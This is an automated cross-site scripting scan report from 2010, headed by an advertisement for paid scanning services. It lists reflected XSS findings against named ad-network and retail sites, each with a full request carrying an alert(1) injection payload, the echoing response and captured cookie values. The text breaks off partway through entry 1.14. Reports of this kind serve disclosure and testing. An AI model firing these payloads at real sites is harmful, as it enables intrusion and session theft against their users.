Contractor for Hire: Per Minute, Per Day, Bounty Hunting

Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for
CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4:
Report generated by XSS.CX at Sat Nov 27 21:03:18 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

1.1. http://b.collective-media.net/adj/bzo.361/L3_4985265 [REST URL parameter 2]

1.2. http://b.collective-media.net/adj/bzo.361/L3_4985265 [REST URL parameter 3]

1.3. http://b.collective-media.net/adj/bzo.361/L3_4985265 [name of an arbitrarily supplied request parameter]

1.4. http://b.collective-media.net/cmadj/bzo.361/L3_4985265 [REST URL parameter 2]

1.5. http://b.collective-media.net/cmadj/bzo.361/L3_4985265 [REST URL parameter 3]

1.6. http://b.collective-media.net/cmadj/bzo.361/L3_4985265 [name of an arbitrarily supplied request parameter]

1.7. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 2]

1.8. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 3]

1.9. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 4]

1.10. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 5]

1.11. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 6]

1.12. http://www.myshape.com/shop/designers [REST URL parameter 1]

1.13. http://www.myshape.com/shop/designers [REST URL parameter 1]

1.14. http://www.myshape.com/shop/designers [REST URL parameter 2]

1.15. http://www.thesundaytimes.co.uk/sto/public/ [sectionUniqueName parameter]

1.16. https://www.timesplus.co.uk/iam/app/logout [targetURL parameter]

1.17. http://www.smarter.com/se--qq-london%2Btimes%2Bdress.html [Referer HTTP header]

1.18. http://b.collective-media.net/cmadj/bzo.361/L3_4985265 [cli cookie]

1.19. http://optimized-by.rubiconproject.com/a/7753/12919/23787-15.js [ruid cookie]



1. Cross-site scripting (reflected)
There are 19 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://b.collective-media.net/adj/bzo.361/L3_4985265 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /adj/bzo.361/L3_4985265

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d663'-alert(1)-'ed654c53c03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.3611d663'-alert(1)-'ed654c53c03/L3_4985265 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; targ=1; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 28 Nov 2010 01:59:59 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Tue, 28-Dec-2010 01:59:59 GMT
Content-Length: 421

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://b.collective-media.net/cmadj/bzo.3611d663'-alert(1)-'ed654c53c03/L3_4985265;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.2. http://b.collective-media.net/adj/bzo.361/L3_4985265 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /adj/bzo.361/L3_4985265

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c46a'-alert(1)-'eda1e31728a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.361/L3_49852655c46a'-alert(1)-'eda1e31728a HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; targ=1; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 28 Nov 2010 02:00:00 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Tue, 28-Dec-2010 02:00:00 GMT
Content-Length: 421

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://b.collective-media.net/cmadj/bzo.361/L3_49852655c46a'-alert(1)-'eda1e31728a;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://b.collective-media.net/adj/bzo.361/L3_4985265 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /adj/bzo.361/L3_4985265

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8cbd'-alert(1)-'5857c35faf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.361/L3_4985265?a8cbd'-alert(1)-'5857c35faf4=1 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; targ=1; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 28 Nov 2010 01:59:59 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Tue, 28-Dec-2010 01:59:59 GMT
Content-Length: 424

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://b.collective-media.net/cmadj/bzo.361/L3_4985265?a8cbd'-alert(1)-'5857c35faf4=1;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://b.collective-media.net/cmadj/bzo.361/L3_4985265 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /cmadj/bzo.361/L3_4985265

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e9b8'-alert(1)-'7f9a6a0b31b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.3611e9b8'-alert(1)-'7f9a6a0b31b/L3_4985265 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; targ=1; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 28 Nov 2010 02:00:05 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7421

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-11237811_1290909605","http://ad.doubleclick.net//bzo.3611e9b8'-alert(1)-'7f9a6a0b31b/L3_4985265;net=bzo;u=,bzo-11237811_1290909605,11bbcecf1d09b9d,none,bzo.sports_l-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz1-cm.biz_h-cm.ent_l-cm.sports_h-
...[SNIP]...

1.5. http://b.collective-media.net/cmadj/bzo.361/L3_4985265 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /cmadj/bzo.361/L3_4985265

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 931f7'-alert(1)-'5d3034c68b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.361/L3_4985265931f7'-alert(1)-'5d3034c68b9 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; targ=1; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 28 Nov 2010 02:00:06 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7421

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-70064940_1290909606","http://ad.doubleclick.net//bzo.361/L3_4985265931f7'-alert(1)-'5d3034c68b9;net=bzo;u=,bzo-70064940_1290909606,11bbcecf1d09b9d,none,bzo.sports_l-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz1-cm.biz_h-cm.ent_l-cm.sports_h-cm.none_h;;
...[SNIP]...

1.6. http://b.collective-media.net/cmadj/bzo.361/L3_4985265 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.collective-media.net
Path:   /cmadj/bzo.361/L3_4985265

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6f0b'-alert(1)-'3877737201e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.361/L3_4985265?c6f0b'-alert(1)-'3877737201e=1 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; targ=1; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 28 Nov 2010 02:00:04 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7424

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-96090342_1290909604","http://ad.doubleclick.net//bzo.361/L3_4985265?c6f0b'-alert(1)-'3877737201e=1;net=bzo;u=,bzo-96090342_1290909604,11bbcecf1d09b9d,none,bzo.sports_l-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz1-cm.biz_h-cm.ent_l-cm.sports_h-cm.none_h
...[SNIP]...

1.7. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/Times/paywall/rtg/nov2010/111929@Bottom1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f28b"><script>alert(1)</script>99910817cc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/Times1f28b"><script>alert(1)</script>99910817cc0/paywall/rtg/nov2010/111929@Bottom1 HTTP/1.1
Host: b3-uk.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; RMFL=011PLifeU1070S|U1070T; dlx_7d=set; NXCLICK2=011PLj2dNX_Nonsecure!y!B3!gA!14lNX_TRACK_Dell/Delldhsretargeting_NX_Nonsecure!yNX_TRACK_Dell/Dellsmbretargeting_NX_Nonsecure!y!B3!gA!14l; OAX=rnoX2ky07x0ACKAn; NSC_n1efm_qppm_iuuq=ffffffff09097b8145525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2010 02:00:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 307
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/Times1f28b"><script>alert(1)</script>99910817cc0/paywall/rtg/nov2010/1888755414/Bottom1/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IMG SR
...[SNIP]...

1.8. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/Times/paywall/rtg/nov2010/111929@Bottom1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5461e"><script>alert(1)</script>7f53514f09a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/Times/paywall5461e"><script>alert(1)</script>7f53514f09a/rtg/nov2010/111929@Bottom1 HTTP/1.1
Host: b3-uk.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; RMFL=011PLifeU1070S|U1070T; dlx_7d=set; NXCLICK2=011PLj2dNX_Nonsecure!y!B3!gA!14lNX_TRACK_Dell/Delldhsretargeting_NX_Nonsecure!yNX_TRACK_Dell/Dellsmbretargeting_NX_Nonsecure!y!B3!gA!14l; OAX=rnoX2ky07x0ACKAn; NSC_n1efm_qppm_iuuq=ffffffff09097b8145525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2010 02:00:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 307
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/Times/paywall5461e"><script>alert(1)</script>7f53514f09a/rtg/nov2010/1390126823/Bottom1/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IMG SR
...[SNIP]...

1.9. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/Times/paywall/rtg/nov2010/111929@Bottom1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc5b2"><script>alert(1)</script>ba0e2b246aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/Times/paywall/rtgfc5b2"><script>alert(1)</script>ba0e2b246aa/nov2010/111929@Bottom1 HTTP/1.1
Host: b3-uk.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; RMFL=011PLifeU1070S|U1070T; dlx_7d=set; NXCLICK2=011PLj2dNX_Nonsecure!y!B3!gA!14lNX_TRACK_Dell/Delldhsretargeting_NX_Nonsecure!yNX_TRACK_Dell/Dellsmbretargeting_NX_Nonsecure!y!B3!gA!14l; OAX=rnoX2ky07x0ACKAn; NSC_n1efm_qppm_iuuq=ffffffff09097b8145525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2010 02:00:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 305
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/Times/paywall/rtgfc5b2"><script>alert(1)</script>ba0e2b246aa/nov2010/73775802/Bottom1/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IMG SRC=
...[SNIP]...

1.10. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/Times/paywall/rtg/nov2010/111929@Bottom1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7faa4"><script>alert(1)</script>0ebfcaec140 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/Times/paywall/rtg/nov20107faa4"><script>alert(1)</script>0ebfcaec140/111929@Bottom1 HTTP/1.1
Host: b3-uk.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; RMFL=011PLifeU1070S|U1070T; dlx_7d=set; NXCLICK2=011PLj2dNX_Nonsecure!y!B3!gA!14lNX_TRACK_Dell/Delldhsretargeting_NX_Nonsecure!yNX_TRACK_Dell/Dellsmbretargeting_NX_Nonsecure!y!B3!gA!14l; OAX=rnoX2ky07x0ACKAn; NSC_n1efm_qppm_iuuq=ffffffff09097b8145525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2010 02:00:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 307
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/Times/paywall/rtg/nov20107faa4"><script>alert(1)</script>0ebfcaec140/1035334946/Bottom1/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IMG SR
...[SNIP]...

1.11. http://b3-uk.mookie1.com/2/Times/paywall/rtg/nov2010/111929@Bottom1 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/Times/paywall/rtg/nov2010/111929@Bottom1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6ae"><script>alert(1)</script>9f856ee4f0a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/Times/paywall/rtg/nov2010/111929@Bottom13b6ae"><script>alert(1)</script>9f856ee4f0a HTTP/1.1
Host: b3-uk.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; RMFL=011PLifeU1070S|U1070T; dlx_7d=set; NXCLICK2=011PLj2dNX_Nonsecure!y!B3!gA!14lNX_TRACK_Dell/Delldhsretargeting_NX_Nonsecure!yNX_TRACK_Dell/Dellsmbretargeting_NX_Nonsecure!y!B3!gA!14l; OAX=rnoX2ky07x0ACKAn; NSC_n1efm_qppm_iuuq=ffffffff09097b8145525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2010 02:00:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 298
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/Times/paywall/rtg/nov2010/287756870/Bottom13b6ae"><script>alert(1)</script>9f856ee4f0a/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IMG SRC
...[SNIP]...

1.12. http://www.myshape.com/shop/designers [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myshape.com
Path:   /shop/designers

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70147"><a>1c5308ff1a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shop70147"><a>1c5308ff1a0/designers HTTP/1.1
Host: www.myshape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=RLQRVMSweb2CKIIM; path=/
Date: Sun, 28 Nov 2010 01:59:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.10
Set-Cookie: id=6if2h8ar0m6vtcbpb1371c0uv2; expires=Wed, 08-Dec-2010 01:59:15 GMT; path=/; domain=.myshape.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24058

<!DOCTYPE html>
<html>
   <head>
           <title>MyShape 404 Oops</title>
       <meta name="keywords" content="" />
       <meta name="description" content="MyShape 404 Oops" />
       <meta http-equiv="X-UA-Compatible
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/modules/shop70147"><a>1c5308ff1a0/tpl/default/css/0-ie67.css" />
...[SNIP]...

1.13. http://www.myshape.com/shop/designers [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myshape.com
Path:   /shop/designers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4942e"-alert(1)-"cbf67297ae8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop4942e"-alert(1)-"cbf67297ae8/designers HTTP/1.1
Host: www.myshape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=RLQRVMSweb1CKIIK; path=/
Date: Sun, 28 Nov 2010 01:59:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.10
Set-Cookie: id=iltieqs2begd86erhc61cadlg4; expires=Wed, 08-Dec-2010 01:59:20 GMT; path=/; domain=.myshape.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24674

<!DOCTYPE html>
<html>
   <head>
           <title>MyShape 404 Oops</title>
       <meta name="keywords" content="" />
       <meta name="description" content="MyShape 404 Oops" />
       <meta http-equiv="X-UA-Compatible
...[SNIP]...
<script>
   var CURRENT_APP="/shop4942e"-alert(1)-"cbf67297ae8",
       CURRENT_MODULE="/shop4942e"-alert(1)-"cbf67297ae8",
       CURRENT_COMMAND="/designers";
   </script>
...[SNIP]...

1.14. http://www.myshape.com/shop/designers [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myshape.com
Path:   /shop/designers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dcfe"-alert(1)-"f8935cb4790 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

